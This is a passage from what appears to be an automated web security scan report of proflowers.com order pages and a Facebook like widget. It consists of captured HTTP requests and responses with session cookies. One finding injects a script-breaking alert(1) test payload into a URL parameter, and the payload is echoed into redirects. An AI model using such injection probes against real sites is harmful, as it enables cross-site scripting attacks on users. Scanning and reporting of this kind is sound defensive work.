GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815



<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
   Gift Options
</title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /><meta name="CODE_LANGUAGE" content="C#" /><meta name="vs_defaultClientScript" content="JavaScript" /><meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5" />
       <META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/" />
       <div> <div Partner="PFC"> </div> </div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script> <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>
       

<script type="text/javascript">

/* function to move a row cell up one level based on its contents */
/* THIS FUNCTION IS
...[SNIP]...

Request 2

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.proflowers.com/?tile=hmpg_carousel&ssid=27&Ref=HomeNoRef&op=new&COBRAND=pfc
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:30 GMT
Content-Length: 219

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.proflowers.com/?tile=hmpg_carousel&amp;ssid=27&amp;Ref=HomeNoRef&amp;op=new&amp;COBRAND=pfc">here</a>.</h2>
</body></html>

15.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

Request 1

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:23 GMT
Content-Length: 519

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&amp;scAddItem=true&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;trackingpgroup=PBS&amp;op=new&amp;quantity=1&amp;Ref=HomeNoRef&amp;deliveryon=True&amp;deliverydate=5%2f25%2f2011&amp;pid=30008396&amp;ssid=27&amp;COBRAND=pfc&amp;ShowGiftOptions=True&amp;flexChosen=False&amp;selectedrelationshipID=293461">here</a>.</h2>
</body></html>

Request 2

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&ssid=27&Ref=HomeNoRef&op=new&COBRAND=pfc
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:26:49 GMT
Content-Length: 254

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;ssid=27&amp;Ref=HomeNoRef&amp;op=new&amp;COBRAND=pfc">here</a>.</h2>
</body></html>

15.3. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

Request 1

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:48 GMT
Content-Length: 474

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&amp;scAddItem=true&amp;tile=hmpg_podA&amp;trackingpgroup=PBS&amp;op=new&amp;quantity=1&amp;Ref=HomeNoRef&amp;deliveryon=True&amp;deliverydate=5%2f24%2f2011&amp;pid=30003767&amp;ssid=27&amp;COBRAND=pfc&amp;ShowGiftOptions=True&amp;flexChosen=False&amp;selectedrelationshipID=168084">here</a>.</h2>
</body></html>

Request 2

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.proflowers.com/?tile=hmpg_podA&ssid=27&Ref=HomeNoRef&op=new&COBRAND=pfc
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:20 GMT
Content-Length: 215

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.proflowers.com/?tile=hmpg_podA&amp;ssid=27&amp;Ref=HomeNoRef&amp;op=new&amp;COBRAND=pfc">here</a>.</h2>
</body></html>

15.4. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"b3ef0a10",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.63.189.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc73cb5ab6c99310026140" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">42K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_
...[SNIP]...

Request 2

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.207.35
X-Cnection: close
Date: Mon, 09 May 2011 01:00:44 GMT
Content-Length: 8735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"a5f07ac1",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.63.189.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc73cbc01f5c6569629200" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div 